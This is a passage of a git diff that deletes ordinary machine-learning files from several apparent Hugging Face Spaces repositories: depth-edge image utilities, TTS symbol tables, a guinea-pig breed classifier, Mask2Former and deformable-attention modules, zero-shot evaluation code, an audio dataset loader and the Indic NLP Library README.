kernel=np.array([[0,1,0],[1,1,1],[0,1,0]]).astype(np.uint8), iterations=1) - near_edge[dilate_far_edge == 0] = 0 - dilate_near_edge = cv2.dilate(near_edge.astype(np.uint8), kernel=np.array([[0,1,0],[1,1,1],[0,1,0]]).astype(np.uint8), iterations=1) - far_edge[dilate_near_edge == 0] = 0 - init_far_edge = far_edge.copy() - init_near_edge = near_edge.copy() - for i in range(config['depth_edge_dilate_2']): - init_far_edge = cv2.dilate(init_far_edge, kernel=np.array([[0,1,0],[1,1,1],[0,1,0]]).astype(np.uint8), iterations=1) - init_far_edge[init_near_edge == 1] = 0 - init_near_edge = cv2.dilate(init_near_edge, kernel=np.array([[0,1,0],[1,1,1],[0,1,0]]).astype(np.uint8), iterations=1) - init_near_edge[init_far_edge == 1] = 0 - init_far_edge[mask == 0] = 0 - init_near_edge[mask == 0] = 0 - hole_far_edge = 1 - init_far_edge - hole_near_edge = 1 - init_near_edge - change = None - while True: - change = False - hole_far_edge[init_near_edge == 1] = 0 - hole_near_edge[init_far_edge == 1] = 0 - far_pxs, far_pys = np.where((hole_far_edge == 0) * (init_far_edge == 1) > 0) - current_hole_far_edge = hole_far_edge.copy() - for far_px, far_py in zip(far_pxs, far_pys): - min_px = max(far_px - 1, 0) - max_px = min(far_px + 2, mask.shape[0]-1) - min_py = max(far_py - 1, 0) - max_py = min(far_py + 2, mask.shape[1]-1) - hole_far = current_hole_far_edge[min_px: max_px, min_py: max_py] - tmp_mask = mask[min_px: max_px, min_py: max_py] - all_depth_patch = all_depth[min_px: max_px, min_py: max_py] * 0 - all_depth_mask = (all_depth_patch != 0).astype(np.uint8) - cross_element = np.array([[0,1,0],[1,1,1],[0,1,0]])[min_px - (far_px - 1): max_px - (far_px - 1), min_py - (far_py - 1): max_py - (far_py - 1)] - combine_mask = (tmp_mask + all_depth_mask).clip(0, 1) * hole_far * cross_element - tmp_patch = combine_mask * (mask_depth[min_px: max_px, min_py: max_py] + all_depth_patch) - number = np.count_nonzero(tmp_patch) - if number > 0: - mask_depth[far_px, far_py] = np.sum(tmp_patch).astype(np.float32) / max(number, 1e-6) - hole_far_edge[far_px, far_py] = 1 - change = True - near_pxs, near_pys = np.where((hole_near_edge == 0) * (init_near_edge == 1) > 0) - current_hole_near_edge = hole_near_edge.copy() - for near_px, near_py in zip(near_pxs, near_pys): - min_px = max(near_px - 1, 0) - max_px = min(near_px + 2, mask.shape[0]-1) - min_py = max(near_py - 1, 0) - max_py = min(near_py + 2, mask.shape[1]-1) - hole_near = current_hole_near_edge[min_px: max_px, min_py: max_py] - tmp_mask = mask[min_px: max_px, min_py: max_py] - all_depth_patch = all_depth[min_px: max_px, min_py: max_py] * 0 - all_depth_mask = (all_depth_patch != 0).astype(np.uint8) - cross_element = np.array([[0,1,0],[1,1,1],[0,1,0]])[min_px - near_px + 1:max_px - near_px + 1, min_py - near_py + 1:max_py - near_py + 1] - combine_mask = (tmp_mask + all_depth_mask).clip(0, 1) * hole_near * cross_element - tmp_patch = combine_mask * (mask_depth[min_px: max_px, min_py: max_py] + all_depth_patch) - number = np.count_nonzero(tmp_patch) - if number > 0: - mask_depth[near_px, near_py] = np.sum(tmp_patch) / max(number, 1e-6) - hole_near_edge[near_px, near_py] = 1 - change = True - if change is False: - break - - return mask_depth - - - -def vis_depth_edge_connectivity(depth, config): - disp = 1./depth - u_diff = (disp[1:, :] - disp[:-1, :])[:-1, 1:-1] - b_diff = (disp[:-1, :] - disp[1:, :])[1:, 1:-1] - l_diff = (disp[:, 1:] - disp[:, :-1])[1:-1, :-1] - r_diff = (disp[:, :-1] - disp[:, 1:])[1:-1, 1:] - u_over = (np.abs(u_diff) > config['depth_threshold']).astype(np.float32) - b_over = (np.abs(b_diff) > config['depth_threshold']).astype(np.float32) - l_over = (np.abs(l_diff) > config['depth_threshold']).astype(np.float32) - r_over = (np.abs(r_diff) > config['depth_threshold']).astype(np.float32) - concat_diff = np.stack([u_diff, b_diff, r_diff, l_diff], axis=-1) - concat_over = np.stack([u_over, b_over, r_over, l_over], axis=-1) - over_diff = concat_diff * concat_over - pos_over = (over_diff > 0).astype(np.float32).sum(-1).clip(0, 1) - neg_over = (over_diff < 0).astype(np.float32).sum(-1).clip(0, 1) - neg_over[(over_diff > 0).astype(np.float32).sum(-1) > 0] = 0 - _, edge_label = cv2.connectedComponents(pos_over.astype(np.uint8), connectivity=8) - T_junction_maps = np.zeros_like(pos_over) - for edge_id in range(1, edge_label.max() + 1): - edge_map = (edge_label == edge_id).astype(np.uint8) - edge_map = np.pad(edge_map, pad_width=((1,1),(1,1)), mode='constant') - four_direc = np.roll(edge_map, 1, 1) + np.roll(edge_map, -1, 1) + np.roll(edge_map, 1, 0) + np.roll(edge_map, -1, 0) - eight_direc = np.roll(np.roll(edge_map, 1, 1), 1, 0) + np.roll(np.roll(edge_map, 1, 1), -1, 0) + \ - np.roll(np.roll(edge_map, -1, 1), 1, 0) + np.roll(np.roll(edge_map, -1, 1), -1, 0) - eight_direc = (eight_direc + four_direc)[1:-1,1:-1] - pos_over[eight_direc > 2] = 0 - T_junction_maps[eight_direc > 2] = 1 - _, edge_label = cv2.connectedComponents(pos_over.astype(np.uint8), connectivity=8) - edge_label = np.pad(edge_label, 1, mode='constant') - - return edge_label - - - -def max_size(mat, value=0): - if not (mat and mat[0]): return (0, 0) - it = iter(mat) - prev = [(el==value) for el in next(it)] - max_size = max_rectangle_size(prev) - for row in it: - hist = [(1+h) if el == value else 0 for h, el in zip(prev, row)] - max_size = max(max_size, max_rectangle_size(hist), key=get_area) - prev = hist - return max_size - -def max_rectangle_size(histogram): - Info = namedtuple('Info', 'start height') - stack = [] - top = lambda: stack[-1] - max_size = (0, 0) # height, width of the largest rectangle - pos = 0 # current position in the histogram - for pos, height in enumerate(histogram): - start = pos # position where rectangle starts - while True: - if not stack or height > top().height: - stack.append(Info(start, height)) # push - if stack and height < top().height: - max_size = max(max_size, (top().height, (pos-top().start)), - key=get_area) - start, _ = stack.pop() - continue - break # height == top().height goes here - - pos += 1 - for start, height in stack: - max_size = max(max_size, (height, (pos-start)), - key=get_area) - - return max_size - -def get_area(size): - return reduce(mul, size) - -def find_anchors(matrix): - matrix = [[*x] for x in matrix] - mh, mw = max_size(matrix) - matrix = np.array(matrix) - # element = np.zeros((mh, mw)) - for i in range(matrix.shape[0] + 1 - mh): - for j in range(matrix.shape[1] + 1 - mw): - if matrix[i:i + mh, j:j + mw].max() == 0: - return i, i + mh, j, j + mw - -def find_largest_rect(dst_img, bg_color=(128, 128, 128)): - valid = np.any(dst_img[..., :3] != bg_color, axis=-1) - dst_h, dst_w = dst_img.shape[:2] - ret, labels = cv2.connectedComponents(np.uint8(valid == False)) - red_mat = np.zeros_like(labels) - # denoise - for i in range(1, np.max(labels)+1, 1): - x, y, w, h = cv2.boundingRect(np.uint8(labels==i)) - if x == 0 or (x+w) == dst_h or y == 0 or (y+h) == dst_w: - red_mat[labels==i] = 1 - # crop - t, b, l, r = find_anchors(red_mat) - - return t, b, l, r diff --git a/spaces/Jarvis2301/Aku/text/symbols.py b/spaces/Jarvis2301/Aku/text/symbols.py deleted file mode 100644 index 0b26482ce8f44c3b22ef46198fdb92dce11a4e16..0000000000000000000000000000000000000000 --- a/spaces/Jarvis2301/Aku/text/symbols.py +++ /dev/null @@ -1,39 +0,0 @@ -''' -Defines the set of symbols used in text input to the model. -''' - -# japanese_cleaners -_pad = '_' -_punctuation = ',.!?-' -_letters = 'AEINOQUabdefghijkmnoprstuvwyzʃʧ↓↑ ' - - -# japanese_cleaners2 -_pad = '_' -_punctuation = ',.!?-~…' -_letters = 'AEINOQUabdefghijkmnoprstuvwyzʃʧʦ↓↑ ' - - -# korean_cleaners -_pad = '_' -_punctuation = ',.!?…~' -_letters = 'ㄱㄴㄷㄹㅁㅂㅅㅇㅈㅊㅋㅌㅍㅎㄲㄸㅃㅆㅉㅏㅓㅗㅜㅡㅣㅐㅔ ' - - -# chinese_cleaners -_pad = '_' -_punctuation = ',。!?—…' -_letters = 'ㄅㄆㄇㄈㄉㄊㄋㄌㄍㄎㄏㄐㄑㄒㄓㄔㄕㄖㄗㄘㄙㄚㄛㄜㄝㄞㄟㄠㄡㄢㄣㄤㄥㄦㄧㄨㄩˉˊˇˋ˙ ' - - -# zh_ja_mixture_cleaners -_pad = '_' -_punctuation = ',.!?-~…' -_letters = 'AEINOQUabdefghijklmnoprstuvwyzʃʧʦɯɹəɥ⁼ʰ`→↓↑ ' - - -# Export all symbols: -symbols = [_pad] + list(_punctuation) + list(_letters) - -# Special symbol ids -SPACE_ID = symbols.index(" ") \ No newline at end of file diff --git a/spaces/JohnCalimoso/animalbreedidentificationversion1.5/Control/Guineapig/con_guineapig_ensemble.py b/spaces/JohnCalimoso/animalbreedidentificationversion1.5/Control/Guineapig/con_guineapig_ensemble.py deleted file mode 100644 index 2fb54d71aff130affeee0a290f0a0a8fccc74421..0000000000000000000000000000000000000000 --- a/spaces/JohnCalimoso/animalbreedidentificationversion1.5/Control/Guineapig/con_guineapig_ensemble.py +++ /dev/null @@ -1,37 +0,0 @@ -import cv2 -import numpy as np -from PIL import Image -import pickle -import tensorflow as tf -import io - -class gpEnsemble: - def __init__(self,url) -> None: - self.image = url - - def predict_image(self): - # Load the model - load_extractor = tf.keras.models.load_model("././Model/Guineapig/ensemble/resnet_EXTRACTOR.h5") - - modelpath = "././Model/Guineapig/ensemble/dataSaved.pkl" - - with open(modelpath, 'rb') as file: - saved_data = pickle.load(file) - animal_breed = saved_data['class_name'] - model = saved_data['logreg_svm_model'] - - im = Image.open(self.image) - img = im.convert("RGB") - img= np.asarray(img) - image_resized= cv2.resize(img, (224,224)) - features = load_extractor.predict(np.expand_dims(image_resized, axis=0)) - - reshaped_features = features.reshape(features.shape[0],-1) - predicted_class = model.predict(reshaped_features) - pred_prob = model.predict_proba(reshaped_features)[:2] - prediction_probability = pred_prob[0][predicted_class[0]] - predicted_class - - output_class= animal_breed[predicted_class[0]] - - return [output_class, prediction_probability] diff --git a/spaces/KPCGD/bingo/tests/parse.ts b/spaces/KPCGD/bingo/tests/parse.ts deleted file mode 100644 index 92940fe6315f1d7cb2b267ba5e5a7e26460a1de3..0000000000000000000000000000000000000000 --- a/spaces/KPCGD/bingo/tests/parse.ts +++ /dev/null @@ -1,13 +0,0 @@ -import { promises as fs } from 'fs' -import { join } from 'path' -import { parseHeadersFromCurl } from '@/lib/utils' - -(async () => { - const content = await fs.readFile(join(__dirname, './fixtures/curl.txt'), 'utf-8') - const headers = parseHeadersFromCurl(content) - console.log(headers) - - const cmdContent = await fs.readFile(join(__dirname, './fixtures/cmd.txt'), 'utf-8') - const cmdHeaders = parseHeadersFromCurl(cmdContent) - console.log(cmdHeaders) -})() diff --git a/spaces/Kevin676/ChatGPT-with-Voice-Cloning-in-Chinese/ppg2mel/train/__init__.py b/spaces/Kevin676/ChatGPT-with-Voice-Cloning-in-Chinese/ppg2mel/train/__init__.py deleted file mode 100644 index 4287ca8617970fa8fc025b75cb319c7032706910..0000000000000000000000000000000000000000 --- a/spaces/Kevin676/ChatGPT-with-Voice-Cloning-in-Chinese/ppg2mel/train/__init__.py +++ /dev/null @@ -1 +0,0 @@ -# \ No newline at end of file diff --git a/spaces/Kimata/Sanskrit-TTS/indic_nlp_library/README.md b/spaces/Kimata/Sanskrit-TTS/indic_nlp_library/README.md deleted file mode 100644 index 0b7f8a82798e3ee874f8f838a635f89290d3e47e..0000000000000000000000000000000000000000 --- a/spaces/Kimata/Sanskrit-TTS/indic_nlp_library/README.md +++ /dev/null @@ -1,142 +0,0 @@ -# Indic NLP Library - -The goal of the Indic NLP Library is to build Python based libraries for common text processing and Natural Language Processing in Indian languages. Indian languages share a lot of similarity in terms of script, phonology, language syntax, etc. and this library is an attempt to provide a general solution to very commonly required toolsets for Indian language text. - -The library provides the following functionalities: - -- Text Normalization -- Script Information -- Word Tokenization and Detokenization -- Sentence Splitting -- Word Segmentation -- Syllabification -- Script Conversion -- Romanization -- Indicization -- Transliteration -- Translation - -The data resources required by the Indic NLP Library are hosted in a different repository. These resources are required for some modules. You can download from the [Indic NLP Resources](https://github.com/anoopkunchukuttan/indic_nlp_resources) project. - -**If you are interested in Indian language NLP resources, you should check the [Indic NLP Catalog](https://github.com/indicnlpweb/indicnlp_catalog) for pointers.** - -## Pre-requisites - -- Python 3.x - - (For Python 2.x version check the tag `PYTHON_2.7_FINAL_JAN_2019`. Not actively supporting Python 2.x anymore, but will try to maintain as much compatibility as possible) -- [Indic NLP Resources](https://github.com/anoopkunchukuttan/indic_nlp_resources) -- [Urduhack](https://github.com/urduhack/urduhack): Needed only if Urdu normalization is required. It has other dependencies like Tensorflow. -- Other dependencies are listed in setup.py - - -## Configuration - -- Installation from pip: - - `pip install indic-nlp-library` - -- If you want to use the project from the github repo, add the project to the Python Path: - - - Clone this repository - - Install dependencies: `pip install -r requirements.txt` - - Run: `export PYTHONPATH=$PYTHONPATH:` - -- In either case, export the path to the _Indic NLP Resources_ directory - - Run: `export INDIC_RESOURCES_PATH=` - -## Usage - -You can use the Python API to access all the features of the library. Many of the most common operations are also accessible via a unified commandline API. - -### Getting Started - -Check [this IPython Notebook](http://nbviewer.ipython.org/url/anoopkunchukuttan.github.io/indic_nlp_library/doc/indic_nlp_examples.ipynb) for examples to use the Python API. - - You can find the Python 2.x Notebook [here](http://nbviewer.ipython.org/url/anoopkunchukuttan.github.io/indic_nlp_library/doc/indic_nlp_examples_2_7.ipynb) - -### Documentation - -You can find detailed documentation [HERE](https://indic-nlp-library.readthedocs.io/en/latest) - -This documents the Python API as well as the commandline reference. - -## Citing - -If you use this library, please include the following citation: - -``` -@misc{kunchukuttan2020indicnlp, -author = "Anoop Kunchukuttan", -title = "{The IndicNLP Library}", -year = "2020", -howpublished={\url{https://github.com/anoopkunchukuttan/indic_nlp_library/blob/master/docs/indicnlp.pdf}} -} -``` -You can find the document [HERE](docs/indicnlp.pdf) - -## Website - -`http://anoopkunchukuttan.github.io/indic_nlp_library` - -## Author -Anoop Kunchukuttan ([anoop.kunchukuttan@gmail.com](anoop.kunchukuttan@gmail.com)) - -## Companies, Organizations, Projects using IndicNLP Library - -- [AI4Bharat-IndicNLPSuite](https://indicnlp.ai4bharat.org) -- [The Classical Language Toolkit](http://cltk.org) -- [Microsoft NLP Recipes](https://github.com/microsoft/nlp-recipes) -- [Facebook M2M-100](https://github.com/pytorch/fairseq/tree/master/examples/m2m_100) - -## Revision Log - - -0.81 : 26 May 2021 - - - Bug fix in version number extraction - -0.80 : 24 May 2021 - - - Improved sentence splitting - - Bug fixes - - Support for Urdu Normalizer - -0.71 : 03 Sep 2020 - - - Improved documentation - - Bug fixes - -0.7 : 02 Apr 2020: - - - Unified commandline - - Improved documentation - - Added setup.py - -0.6 : 16 Dec 2019: - - - New romanizer and indicizer - - Script Unifiers - - Improved script normalizers - - Added contrib directory for sample uses - - changed to MIT license - -0.5 : 03 Jun 2019: - - - Improved word tokenizer to handle dates and numbers. - - Added sentence splitter that can handle common prefixes/honorofics and uses some heuristics. - - Added detokenizer - - Added acronym transliterator that can convert English acronyms to Brahmi-derived scripts - -0.4 : 28 Jan 2019: Ported to Python 3, and lots of feature additions since last release; primarily around script information, script similarity and syllabification. - -0.3 : 21 Oct 2014: Supports morph-analysis between Indian languages - -0.2 : 13 Jun 2014: Supports transliteration between Indian languages and tokenization of Indian languages - -0.1 : 12 Mar 2014: Initial version. Supports text normalization. - -## LICENSE - -Indic NLP Library is released under the MIT license - - diff --git a/spaces/KyanChen/RSPrompter/mmdet/models/detectors/mask2former.py b/spaces/KyanChen/RSPrompter/mmdet/models/detectors/mask2former.py deleted file mode 100644 index 4f38ef44e482039fdf7476d048eee5df2a96fd9b..0000000000000000000000000000000000000000 --- a/spaces/KyanChen/RSPrompter/mmdet/models/detectors/mask2former.py +++ /dev/null @@ -1,30 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -from mmdet.registry import MODELS -from mmdet.utils import ConfigType, OptConfigType, OptMultiConfig -from .maskformer import MaskFormer - - -@MODELS.register_module() -class Mask2Former(MaskFormer): - r"""Implementation of `Masked-attention Mask - Transformer for Universal Image Segmentation - `_.""" - - def __init__(self, - backbone: ConfigType, - neck: OptConfigType = None, - panoptic_head: OptConfigType = None, - panoptic_fusion_head: OptConfigType = None, - train_cfg: OptConfigType = None, - test_cfg: OptConfigType = None, - data_preprocessor: OptConfigType = None, - init_cfg: OptMultiConfig = None): - super().__init__( - backbone=backbone, - neck=neck, - panoptic_head=panoptic_head, - panoptic_fusion_head=panoptic_fusion_head, - train_cfg=train_cfg, - test_cfg=test_cfg, - data_preprocessor=data_preprocessor, - init_cfg=init_cfg) diff --git a/spaces/Laihiujin/OneFormer/oneformer/modeling/pixel_decoder/ops/modules/ms_deform_attn.py b/spaces/Laihiujin/OneFormer/oneformer/modeling/pixel_decoder/ops/modules/ms_deform_attn.py deleted file mode 100644 index 55436f358ae708827d40a49b7d991da60bb89b39..0000000000000000000000000000000000000000 --- a/spaces/Laihiujin/OneFormer/oneformer/modeling/pixel_decoder/ops/modules/ms_deform_attn.py +++ /dev/null @@ -1,129 +0,0 @@ -# ------------------------------------------------------------------------------------------------ -# Deformable DETR -# Copyright (c) 2020 SenseTime. All Rights Reserved. -# Licensed under the Apache License, Version 2.0 [see LICENSE for details] -# ------------------------------------------------------------------------------------------------ -# Modified from https://github.com/chengdazhi/Deformable-Convolution-V2-PyTorch/tree/pytorch_1.0.0 -# ------------------------------------------------------------------------------------------------ - -# Copyright (c) Facebook, Inc. and its affiliates. -# Modified by Bowen Cheng from https://github.com/fundamentalvision/Deformable-DETR - -from __future__ import absolute_import -from __future__ import print_function -from __future__ import division - -import warnings -import math - -import torch -from torch import nn -import torch.nn.functional as F -from torch.nn.init import xavier_uniform_, constant_ - -if torch.cuda.is_available(): - from ..functions import MSDeformAttnFunction -else: - MSDeformAttnFunction = None -from ..functions.ms_deform_attn_func import ms_deform_attn_core_pytorch - - -def _is_power_of_2(n): - if (not isinstance(n, int)) or (n < 0): - raise ValueError("invalid input for _is_power_of_2: {} (type: {})".format(n, type(n))) - return (n & (n-1) == 0) and n != 0 - - -class MSDeformAttn(nn.Module): - def __init__(self, d_model=256, n_levels=4, n_heads=8, n_points=4): - """ - Multi-Scale Deformable Attention Module - :param d_model hidden dimension - :param n_levels number of feature levels - :param n_heads number of attention heads - :param n_points number of sampling points per attention head per feature level - """ - super().__init__() - if d_model % n_heads != 0: - raise ValueError('d_model must be divisible by n_heads, but got {} and {}'.format(d_model, n_heads)) - _d_per_head = d_model // n_heads - # you'd better set _d_per_head to a power of 2 which is more efficient in our CUDA implementation - if not _is_power_of_2(_d_per_head): - warnings.warn("You'd better set d_model in MSDeformAttn to make the dimension of each attention head a power of 2 " - "which is more efficient in our CUDA implementation.") - - self.im2col_step = 128 - - self.d_model = d_model - self.n_levels = n_levels - self.n_heads = n_heads - self.n_points = n_points - - self.sampling_offsets = nn.Linear(d_model, n_heads * n_levels * n_points * 2) - self.attention_weights = nn.Linear(d_model, n_heads * n_levels * n_points) - self.value_proj = nn.Linear(d_model, d_model) - self.output_proj = nn.Linear(d_model, d_model) - - self._reset_parameters() - - def _reset_parameters(self): - constant_(self.sampling_offsets.weight.data, 0.) - thetas = torch.arange(self.n_heads, dtype=torch.float32) * (2.0 * math.pi / self.n_heads) - grid_init = torch.stack([thetas.cos(), thetas.sin()], -1) - grid_init = (grid_init / grid_init.abs().max(-1, keepdim=True)[0]).view(self.n_heads, 1, 1, 2).repeat(1, self.n_levels, self.n_points, 1) - for i in range(self.n_points): - grid_init[:, :, i, :] *= i + 1 - with torch.no_grad(): - self.sampling_offsets.bias = nn.Parameter(grid_init.view(-1)) - constant_(self.attention_weights.weight.data, 0.) - constant_(self.attention_weights.bias.data, 0.) - xavier_uniform_(self.value_proj.weight.data) - constant_(self.value_proj.bias.data, 0.) - xavier_uniform_(self.output_proj.weight.data) - constant_(self.output_proj.bias.data, 0.) - - def forward(self, query, reference_points, input_flatten, input_spatial_shapes, input_level_start_index, input_padding_mask=None): - """ - :param query (N, Length_{query}, C) - :param reference_points (N, Length_{query}, n_levels, 2), range in [0, 1], top-left (0,0), bottom-right (1, 1), including padding area - or (N, Length_{query}, n_levels, 4), add additional (w, h) to form reference boxes - :param input_flatten (N, \sum_{l=0}^{L-1} H_l \cdot W_l, C) - :param input_spatial_shapes (n_levels, 2), [(H_0, W_0), (H_1, W_1), ..., (H_{L-1}, W_{L-1})] - :param input_level_start_index (n_levels, ), [0, H_0*W_0, H_0*W_0+H_1*W_1, H_0*W_0+H_1*W_1+H_2*W_2, ..., H_0*W_0+H_1*W_1+...+H_{L-1}*W_{L-1}] - :param input_padding_mask (N, \sum_{l=0}^{L-1} H_l \cdot W_l), True for padding elements, False for non-padding elements - :return output (N, Length_{query}, C) - """ - N, Len_q, _ = query.shape - N, Len_in, _ = input_flatten.shape - assert (input_spatial_shapes[:, 0] * input_spatial_shapes[:, 1]).sum() == Len_in - - value = self.value_proj(input_flatten) - if input_padding_mask is not None: - value = value.masked_fill(input_padding_mask[..., None], float(0)) - value = value.view(N, Len_in, self.n_heads, self.d_model // self.n_heads) - sampling_offsets = self.sampling_offsets(query).view(N, Len_q, self.n_heads, self.n_levels, self.n_points, 2) - attention_weights = self.attention_weights(query).view(N, Len_q, self.n_heads, self.n_levels * self.n_points) - attention_weights = F.softmax(attention_weights, -1).view(N, Len_q, self.n_heads, self.n_levels, self.n_points) - # N, Len_q, n_heads, n_levels, n_points, 2 - if reference_points.shape[-1] == 2: - offset_normalizer = torch.stack([input_spatial_shapes[..., 1], input_spatial_shapes[..., 0]], -1) - sampling_locations = reference_points[:, :, None, :, None, :] \ - + sampling_offsets / offset_normalizer[None, None, None, :, None, :] - elif reference_points.shape[-1] == 4: - sampling_locations = reference_points[:, :, None, :, None, :2] \ - + sampling_offsets / self.n_points * reference_points[:, :, None, :, None, 2:] * 0.5 - else: - raise ValueError( - 'Last dim of reference_points must be 2 or 4, but get {} instead.'.format(reference_points.shape[-1])) - # try: - if torch.cuda.is_available(): - output = MSDeformAttnFunction.apply( - value, input_spatial_shapes, input_level_start_index, sampling_locations, attention_weights, self.im2col_step) - # except: - else: - # CPU - output = ms_deform_attn_core_pytorch(value, input_spatial_shapes, sampling_locations, attention_weights) - # # For FLOPs calculation only - # output = ms_deform_attn_core_pytorch(value, input_spatial_shapes, sampling_locations, attention_weights) - output = self.output_proj(output) - return output \ No newline at end of file diff --git a/spaces/LanguageBind/LanguageBind/d_cls/zero_shot.py b/spaces/LanguageBind/LanguageBind/d_cls/zero_shot.py deleted file mode 100644 index d5c005a6ad91e128c210e8ddb48310cad2bf6e8c..0000000000000000000000000000000000000000 --- a/spaces/LanguageBind/LanguageBind/d_cls/zero_shot.py +++ /dev/null @@ -1,90 +0,0 @@ -import logging - -import torch -import torch.nn.functional as F -from tqdm import tqdm - -from open_clip import get_input_dtype, get_tokenizer -from open_clip.factory import HF_HUB_PREFIX -from .precision import get_autocast -from .zero_shot_classifier import build_zero_shot_classifier -from .zero_shot_metadata import CLASSNAMES, OPENAI_IMAGENET_TEMPLATES - - -def accuracy(output, target, topk=(1,)): - pred = output.topk(max(topk), 1, True, True)[1].t() - correct = pred.eq(target.view(1, -1).expand_as(pred)) - return [float(correct[:k].reshape(-1).float().sum(0, keepdim=True).cpu().numpy()) for k in topk] - - -def run(model, classifier, dataloader, args): - autocast = get_autocast(args.precision) - input_dtype = get_input_dtype(args.precision) - - with torch.no_grad(): - top1, top5, n = 0., 0., 0. - for images, target in tqdm(dataloader, unit_scale=args.batch_size): - images = images.to(device=args.device, dtype=input_dtype) - images = images.unsqueeze(2) - target = target.to(args.device) - - with autocast(): - # predict - output = model(image=images) - image_features = output['image_features'] if isinstance(output, dict) else output[0] - logits = 100. * image_features @ classifier - - # measure accuracy - acc1, acc5 = accuracy(logits, target, topk=(1, 5)) - top1 += acc1 - top5 += acc5 - n += images.size(0) - - top1 = (top1 / n) - top5 = (top5 / n) - return top1, top5 - - -def zero_shot_eval(model, data, epoch, args): - temp_val_d_cls_data = args.val_d_cls_data - args.val_d_cls_data = list(data.keys()) - assert len(args.val_d_cls_data) == 1 - args.val_d_cls_data = args.val_d_cls_data[0] - - if args.val_d_cls_data not in data: - return {} - if args.zeroshot_frequency == 0: - return {} - if (epoch % args.zeroshot_frequency) != 0 and epoch != args.epochs: - return {} - if args.distributed and not args.horovod: - model = model.module - - logging.info(f'Starting zero-shot {args.val_d_cls_data.upper()}.') - - logging.info('Building zero-shot classifier') - autocast = get_autocast(args.precision) - with autocast(): - tokenizer = get_tokenizer(HF_HUB_PREFIX+args.model, cache_dir=args.cache_dir) - # tokenizer = get_tokenizer("ViT-L-14") - classifier = build_zero_shot_classifier( - model, - tokenizer=tokenizer, - classnames=CLASSNAMES[args.val_d_cls_data], - templates=OPENAI_IMAGENET_TEMPLATES, - num_classes_per_batch=10, - device=args.device, - use_tqdm=True, - ) - - logging.info('Using classifier') - results = {} - if args.val_d_cls_data in data: - top1, top5 = run(model, classifier, data[args.val_d_cls_data].dataloader, args) - results[f'{args.val_d_cls_data}-zeroshot-val-top1'] = top1 - results[f'{args.val_d_cls_data}-zeroshot-val-top5'] = top5 - - logging.info(f'Finished zero-shot {args.val_d_cls_data.upper()}.') - - args.val_d_cls_data = temp_val_d_cls_data - return results diff --git a/spaces/LaynzKunz/Aesthetic_RVC_Inference_HF/lib/infer/infer_libs/uvr5_pack/lib_v5/dataset.py b/spaces/LaynzKunz/Aesthetic_RVC_Inference_HF/lib/infer/infer_libs/uvr5_pack/lib_v5/dataset.py deleted file mode 100644 index cfd01a174978d97180a897e40cb59ecadec1d12e..0000000000000000000000000000000000000000 --- a/spaces/LaynzKunz/Aesthetic_RVC_Inference_HF/lib/infer/infer_libs/uvr5_pack/lib_v5/dataset.py +++ /dev/null @@ -1,183 +0,0 @@ -import os -import random - -import numpy as np -import torch -import torch.utils.data -from tqdm import tqdm - -from . import spec_utils - - -class VocalRemoverValidationSet(torch.utils.data.Dataset): - def __init__(self, patch_list): - self.patch_list = patch_list - - def __len__(self): - return len(self.patch_list) - - def __getitem__(self, idx): - path = self.patch_list[idx] - data = np.load(path) - - X, y = data["X"], data["y"] - - X_mag = np.abs(X) - y_mag = np.abs(y) - - return X_mag, y_mag - - -def make_pair(mix_dir, inst_dir): - input_exts = [".wav", ".m4a", ".mp3", ".mp4", ".flac"] - - X_list = sorted( - [ - os.path.join(mix_dir, fname) - for fname in os.listdir(mix_dir) - if os.path.splitext(fname)[1] in input_exts - ] - ) - y_list = sorted( - [ - os.path.join(inst_dir, fname) - for fname in os.listdir(inst_dir) - if os.path.splitext(fname)[1] in input_exts - ] - ) - - filelist = list(zip(X_list, y_list)) - - return filelist - - -def train_val_split(dataset_dir, split_mode, val_rate, val_filelist): - if split_mode == "random": - filelist = make_pair( - os.path.join(dataset_dir, "mixtures"), - os.path.join(dataset_dir, "instruments"), - ) - - random.shuffle(filelist) - - if len(val_filelist) == 0: - val_size = int(len(filelist) * val_rate) - train_filelist = filelist[:-val_size] - val_filelist = filelist[-val_size:] - else: - train_filelist = [ - pair for pair in filelist if list(pair) not in val_filelist - ] - elif split_mode == "subdirs": - if len(val_filelist) != 0: - raise ValueError( - "The `val_filelist` option is not available in `subdirs` mode" - ) - - train_filelist = make_pair( - os.path.join(dataset_dir, "training/mixtures"), - os.path.join(dataset_dir, "training/instruments"), - ) - - val_filelist = make_pair( - os.path.join(dataset_dir, "validation/mixtures"), - os.path.join(dataset_dir, "validation/instruments"), - ) - - return train_filelist, val_filelist - - -def augment(X, y, reduction_rate, reduction_mask, mixup_rate, mixup_alpha): - perm = np.random.permutation(len(X)) - for i, idx in enumerate(tqdm(perm)): - if np.random.uniform() < reduction_rate: - y[idx] = spec_utils.reduce_vocal_aggressively( - X[idx], y[idx], reduction_mask - ) - - if np.random.uniform() < 0.5: - # swap channel - X[idx] = X[idx, ::-1] - y[idx] = y[idx, ::-1] - if np.random.uniform() < 0.02: - # mono - X[idx] = X[idx].mean(axis=0, keepdims=True) - y[idx] = y[idx].mean(axis=0, keepdims=True) - if np.random.uniform() < 0.02: - # inst - X[idx] = y[idx] - - if np.random.uniform() < mixup_rate and i < len(perm) - 1: - lam = np.random.beta(mixup_alpha, mixup_alpha) - X[idx] = lam * X[idx] + (1 - lam) * X[perm[i + 1]] - y[idx] = lam * y[idx] + (1 - lam) * y[perm[i + 1]] - - return X, y - - -def make_padding(width, cropsize, offset): - left = offset - roi_size = cropsize - left * 2 - if roi_size == 0: - roi_size = cropsize - right = roi_size - (width % roi_size) + left - - return left, right, roi_size - - -def make_training_set(filelist, cropsize, patches, sr, hop_length, n_fft, offset): - len_dataset = patches * len(filelist) - - X_dataset = np.zeros((len_dataset, 2, n_fft // 2 + 1, cropsize), dtype=np.complex64) - y_dataset = np.zeros((len_dataset, 2, n_fft // 2 + 1, cropsize), dtype=np.complex64) - - for i, (X_path, y_path) in enumerate(tqdm(filelist)): - X, y = spec_utils.cache_or_load(X_path, y_path, sr, hop_length, n_fft) - coef = np.max([np.abs(X).max(), np.abs(y).max()]) - X, y = X / coef, y / coef - - l, r, roi_size = make_padding(X.shape[2], cropsize, offset) - X_pad = np.pad(X, ((0, 0), (0, 0), (l, r)), mode="constant") - y_pad = np.pad(y, ((0, 0), (0, 0), (l, r)), mode="constant") - - starts = np.random.randint(0, X_pad.shape[2] - cropsize, patches) - ends = starts + cropsize - for j in range(patches): - idx = i * patches + j - X_dataset[idx] = X_pad[:, :, starts[j] : ends[j]] - y_dataset[idx] = y_pad[:, :, starts[j] : ends[j]] - - return X_dataset, y_dataset - - -def 